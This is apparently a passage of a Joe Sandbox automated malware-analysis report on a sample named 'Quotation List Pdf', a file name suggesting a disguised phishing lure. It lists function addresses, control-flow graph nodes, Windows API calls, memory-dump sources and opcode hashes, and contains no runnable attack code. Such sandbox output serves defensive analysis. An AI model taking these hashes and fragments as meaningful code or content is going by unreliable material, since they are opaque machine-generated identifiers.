                                                      control_flow_graph 260 7ff76849bda4-7ff76849bdad 261 7ff76849bdbe-7ff76849bdc6 malloc 260->261 262 7ff76849bdaf-7ff76849bdb9 call 7ff76849f601 261->262 263 7ff76849bdc8-7ff76849bdcd 261->263 266 7ff76849bdbb 262->266 267 7ff76849bdce-7ff76849bdd2 262->267 266->261 268 7ff76849bdd4-7ff76849bdd9 call 7ff76849c204 267->268 269 7ff76849bdda-7ff76849be39 call 7ff76849c224 267->269 268->269 274 7ff76849be96 269->274 275 7ff76849be3b-7ff76849be58 269->275 278 7ff76849be9d-7ff76849bead 274->278 276 7ff76849be82-7ff76849be94 275->276 277 7ff76849be5a-7ff76849be5f 275->277 276->278 277->276 279 7ff76849be61-7ff76849be66 277->279 280 7ff76849beaf-7ff76849becc 278->280 281 7ff76849bf14-7ff76849bf43 278->281 279->276 284 7ff76849be68-7ff76849be70 279->284 285 7ff76849bed9-7ff76849bedc 280->285 286 7ff76849bece-7ff76849bed2 280->286 282 7ff76849bf60-7ff76849bf64 281->282 283 7ff76849bf45-7ff76849bf5a 281->283 289 7ff76849c095-7ff76849c0a9 282->289 290 7ff76849bf6a-7ff76849bf7e 282->290 283->282 284->274 291 7ff76849be72-7ff76849be80 284->291 287 7ff76849bef7-7ff76849beff 285->287 288 7ff76849bede-7ff76849bef4 285->288 286->285 287->281 292 7ff76849bf01-7ff76849bf11 287->292 288->287 293 7ff76849bf84-7ff76849bf8c 290->293 294 7ff76849c07a-7ff76849c07f 290->294 291->274 291->276 292->281 293->294 296 7ff76849bf92-7ff76849bfb1 293->296 294->289 295 7ff76849c081-7ff76849c08a 294->295 295->289 297 7ff76849c08c 295->297 298 7ff76849c010 296->298 299 7ff76849bfb3-7ff76849bfe3 296->299 297->289 301 7ff76849c017-7ff76849c01b 298->301 300 7ff76849bfe5-7ff76849bfed 299->300 299->301 300->298 302 7ff76849bfef-7ff76849c00e 300->302 303 7ff76849c029-7ff76849c02e 301->303 304 7ff76849c01d-7ff76849c022 301->304 302->301 303->294 305 7ff76849c030-7ff76849c038 303->305 304->303 305->294 306 7ff76849c03a-7ff76849c06d 305->306 306->294 307 7ff76849c06f-7ff76849c073 306->307 307->294
                                                      APIs
                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF76849B4B9,?,?,?,?,00007FF76843E7A1,?,?,?,00007FF76843ED24,00000000,00000020,?), ref: 00007FF76849BDBE
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF76849BDD4
                                                        • Part of subcall function 00007FF76849C204: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF76849C20D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                      • String ID:
                                                      • API String ID: 205171174-0
                                                      • Opcode ID: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
                                                      • Instruction ID: 43339a78c9b76254aa364f94c67f0d0a281cae461dd6d937c03de9553434fa9c
                                                      • Opcode Fuzzy Hash: bf961b2ab8b72b6bb4696f625dc9e1acb4f646454a2333270e2ccd61e10cc9a7
                                                      • Instruction Fuzzy Hash: F981E971E08602C9FB24AF69A841A74FBE1FF08364F804739D56E8B7D5DE3D58408768
                                                      Function 00007FF7684638B0 Relevance: .4, Instructions: 397COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentProcess
                                                      • String ID:
                                                      • API String ID: 2050909247-0
                                                      • Opcode ID: 08012919a8b1b8081b4c713736aa929bcbe064cfab43f142deed8e71929d45e1
                                                      • Instruction ID: c9b1d92edb7ac43e3cfec853ab7dbbd8af93a130d2268a4c4fef38d57e95f3dd
                                                      • Opcode Fuzzy Hash: 08012919a8b1b8081b4c713736aa929bcbe064cfab43f142deed8e71929d45e1
                                                      • Instruction Fuzzy Hash: BF02A3B1E08686C6F615AF25A841638FBA3BF55784F84463AD50E33262DF3DB4C1C678
                                                      Function 00007FF7684621B0 Relevance: .3, Instructions: 316COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1114855c8192a3a17f8c3631f55f4fa67d8beb613ff41ef3d3edadf3381c0416
                                                      • Instruction ID: 2d7b9834e87226e0f9df184df43f90b04332f8f152e4b588199fc58a2ac2eb46
                                                      • Opcode Fuzzy Hash: 1114855c8192a3a17f8c3631f55f4fa67d8beb613ff41ef3d3edadf3381c0416
                                                      • Instruction Fuzzy Hash: A9F1B021D1DB53C6F651FF20A9116B5E753AF99780FC88336E40D612A3EF2CB4D482A8
                                                      Function 00007FF768442750 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                      • String ID: @$@$@
                                                      • API String ID: 2645093340-1177533131
                                                      • Opcode ID: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
                                                      • Instruction ID: 81f60e80041592d851dd913ecba34a542d4ff8618e3a2bc76a7d96fcea8f9e94
                                                      • Opcode Fuzzy Hash: 46198da623394d7b15bb719f5e4a5128e58e6380a5aeb4f160e59a8db540b038
                                                      • Instruction Fuzzy Hash: A1414231608AD1C5EB719F11E4043A9F760FF88B60F884335DAAD87A99DF7CD4488B15
                                                      Function 00007FF76843D0F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D0FB
                                                        • Part of subcall function 00007FF768442B90: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442B9F
                                                        • Part of subcall function 00007FF768442B90: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442BDD
                                                        • Part of subcall function 00007FF768442B90: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C09
                                                        • Part of subcall function 00007FF768442B90: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C1A
                                                        • Part of subcall function 00007FF768442B90: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C29
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D16D
                                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF76843D180
                                                      • QueryInformationJobObject.KERNEL32 ref: 00007FF76843D1CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
                                                      • String ID: PROCESSOR_COUNT
                                                      • API String ID: 1701933505-4048346908
                                                      • Opcode ID: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
                                                      • Instruction ID: ce64fb5b53e04c884c58b28c7e2abbc1cbe57fb74867e0d226a42795ad020953
                                                      • Opcode Fuzzy Hash: 25420fbf59497c97a6a616538860f2c47e8523c816d87657a417c9793d34a5e2
                                                      • Instruction Fuzzy Hash: 32316031A08A42C7EF54BF52E8803B9EBA1EF84798FC40535D64D57695DF2CE4098B68
                                                      Function 00007FF768433630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF768433726
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise$Sleep
                                                      • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                      • API String ID: 3706814929-926682358
                                                      • Opcode ID: 6d01acea836dd96b47c2c5e0993a22bc70c2472d024c1f230ebefcf46e4bbae2
                                                      • Instruction ID: cc4e02bffcfea0335bfed2a05f729184160e821c137e72df8b6a4391dd818e08
                                                      • Opcode Fuzzy Hash: 6d01acea836dd96b47c2c5e0993a22bc70c2472d024c1f230ebefcf46e4bbae2
                                                      • Instruction Fuzzy Hash: B9410A72A08A46C7FBA0AF16F540369F7A1EF047C8F848139CA4D463A1DF3DE955C668
                                                      Function 00007FF76843D350 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                      • String ID:
                                                      • API String ID: 2150560229-0
                                                      • Opcode ID: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
                                                      • Instruction ID: 6d9420ab739dc9b7a194452587f727e429facc3fe4740e5c6d43dd754b07b093
                                                      • Opcode Fuzzy Hash: 1fd97627cfe8389e38b2286a366fd33d3ebac3e1f7f8eb4fcf4620db7d9795ed
                                                      • Instruction Fuzzy Hash: 87E065A9E55702C2FB14AF21A814335D350BF98B85F885038DD4E06351DF3C91454D28
                                                      Function 00007FF768442570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 175 7ff768442570-7ff7684425a1 176 7ff7684425a7-7ff7684425c2 GetCurrentProcess call 7ff76849b0da 175->176 177 7ff76844265f-7ff76844267c GlobalMemoryStatusEx 175->177 176->177 188 7ff7684425c8-7ff7684425d0 176->188 179 7ff768442702-7ff768442705 177->179 180 7ff768442682-7ff768442685 177->180 181 7ff768442707-7ff76844270b 179->181 182 7ff76844270e-7ff768442711 179->182 184 7ff768442687-7ff768442692 180->184 185 7ff7684426f1-7ff7684426f4 180->185 181->182 186 7ff76844271b-7ff76844271e 182->186 187 7ff768442713-7ff768442718 182->187 189 7ff76844269b-7ff7684426ac 184->189 190 7ff768442694-7ff768442699 184->190 191 7ff7684426f9-7ff7684426fc 185->191 192 7ff7684426f6 185->192 193 7ff768442728-7ff76844274b call 7ff76849b490 186->193 194 7ff768442720 186->194 187->186 195 7ff76844263a-7ff76844263f 188->195 196 7ff7684425d2-7ff7684425d8 188->196 197 7ff7684426b0-7ff7684426c1 189->197 190->197 191->193 198 7ff7684426fe-7ff768442700 191->198 192->191 199 7ff768442725 194->199 205 7ff768442651-7ff768442654 195->205 206 7ff768442641-7ff768442644 195->206 200 7ff7684425da-7ff7684425df 196->200 201 7ff7684425e1-7ff7684425f5 196->201 203 7ff7684426ca-7ff7684426de 197->203 204 7ff7684426c3-7ff7684426c8 197->204 198->199 199->193 208 7ff7684425f9-7ff76844260a 200->208 201->208 210 7ff7684426e2-7ff7684426ee 203->210 204->210 205->193 207 7ff76844265a 205->207 211 7ff76844264b-7ff76844264e 206->211 212 7ff768442646-7ff768442649 206->212 207->199 213 7ff76844260c-7ff768442611 208->213 214 7ff768442613-7ff768442627 208->214 210->185 211->205 212->205 215 7ff76844262b-7ff768442637 213->215 214->215 215->195
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CurrentGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 3261791682-2766056989
                                                      • Opcode ID: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
                                                      • Instruction ID: c5e36e26c28d6779333897a9ff0477391c7c6f67051f36ad6c5aac88585b9b18
                                                      • Opcode Fuzzy Hash: d415d27f6ddf2cca45eba18734769ddeecb613225847b9f00db101291d5e82da
                                                      • Instruction Fuzzy Hash: AC41E421A09B6681EA56EF369110339DA92EF5DBC0F5CC731D90EA6744FF3CE4858A24
                                                      Function 00007FF768448DCB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Count64Tick
                                                      • String ID: D)
                                                      • API String ID: 1927824332-848725745
                                                      • Opcode ID: 738b33bdc5b30434fa873a3cc482db2f0a1aff3c0c979400cab83d7b5406ce2f
                                                      • Instruction ID: 96398dcfbc00da20b2fab7a6241b697706c3ed67d28c163367539d2b386793df
                                                      • Opcode Fuzzy Hash: 738b33bdc5b30434fa873a3cc482db2f0a1aff3c0c979400cab83d7b5406ce2f
                                                      • Instruction Fuzzy Hash: EB41A031E49646C5FA61BF20E844279EA92EF40B80FEC4436C90D526A2DE3DF548C3AD
                                                      Function 00007FF768442E10 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF768446968,?,?,0000000B,00007FF768445830,?,?,00000000,00007FF76843FBF1), ref: 00007FF768442E37
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF768446968,?,?,0000000B,00007FF768445830,?,?,00000000,00007FF76843FBF1), ref: 00007FF768442E57
                                                      • VirtualAllocExNuma.KERNEL32 ref: 00007FF768442E78
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual$CurrentNumaProcess
                                                      • String ID:
                                                      • API String ID: 647533253-0
                                                      • Opcode ID: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
                                                      • Instruction ID: 31abebf154bb666c4093261adc46e46b32ab68380da57a52192ff340d8393228
                                                      • Opcode Fuzzy Hash: 5188d5bc0a99c14dc0d2229a5aba8e7e5169a6da6aec5c86698c49050b78a37c
                                                      • Instruction Fuzzy Hash: 43F0AF71B186A1C2EB209F06F400219E760EF49BD5F584138EF8C17B68CF3DC5818B18
                                                      Function 00007FF768442DD0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Virtual$AllocFree
                                                      • String ID:
                                                      • API String ID: 2087232378-0
                                                      • Opcode ID: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
                                                      • Instruction ID: 32ac553cb699f9489ebfc282ee18b6ab5e571c72b4e3901985e81bda92588f83
                                                      • Opcode Fuzzy Hash: 3b0924aad5c9d8f1e4054d63f84a8e7ac6c370ab154e50dab9d8d9c549d06468
                                                      • Instruction Fuzzy Hash: 65E0C228F1A111C2EB18AB12A885664D6916F4DB04FD48038C50D43360EE2DA15B8F74
                                                      Function 00007FF7684DCFB0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF7684DCE70,?,?,00000030), ref: 00007FF7684DD029
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: d260e6bf7434607846c4d61dd018d3f30570e5d6e4ce6bbd326d91653f400847
                                                      • Instruction ID: a443542a5561bba70721b649b625379af9ad783a81e9ec7f780728a6c1cc6a4b
                                                      • Opcode Fuzzy Hash: d260e6bf7434607846c4d61dd018d3f30570e5d6e4ce6bbd326d91653f400847
                                                      • Instruction Fuzzy Hash: A131C622E08656C6FB51BF52E8413FDEA606F84794FC40035DE0D17786EE2CE886C364
                                                      Function 00007FF768432AB0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
